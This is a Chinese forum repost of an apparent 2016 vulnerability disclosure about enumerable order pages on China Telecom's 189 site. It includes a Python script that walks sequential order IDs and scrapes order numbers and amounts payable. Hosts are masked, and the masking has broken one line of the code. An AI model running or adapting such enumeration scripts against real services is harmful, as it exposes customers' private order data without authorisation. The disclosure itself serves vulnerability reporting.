HanDs
管理员

[7月漏洞公开] 中国电信189主站数十万订单泄露(附python遍历脚本) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

中国电信189主站数十万订单泄露(附python遍历脚本)

详细说明:

电信 189主站订单可以遍历



QQ20160528-0.png





订单可遍历

mask 区域
1.http://**.**.**/trade/pay/init.doorderId=8341605257418002





QQ20160528-1.png





附遍历脚本



code 区域
#coding:utf-8

import requests
import time
import re
from bs4 import BeautifulSoup

for i in range(10000,40000):
s = requests.get("http://**.**.**.**/trade/pay/init.do?orderId=83416052574"+str(i))
soup = BeautifulSoup(s.text)
temp1 = soup.find_all("p","order-num-info")
temp2 = soup.find_all("p","amount-pay")
p1 = **.**.**.**pile("<p class=\"order-num-info\">(.*)</p>")
p2 = **.**.**.**pile("<p class=\"amount-pay\">(.*)</p>")
print "订单号:",
print p1.findall(str(temp1))
print "应付金额:",
print p2.findall(str(temp2))
time.sleep(1)





QQ20160528-2.png





QQ20160528-3.png

漏洞证明:

已证明

修复方案:

权限哦


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
中国 电信 1 89
#1楼
发帖时间:2016-7-15   |   查看数:0   |   回复数:0
游客组
快速回复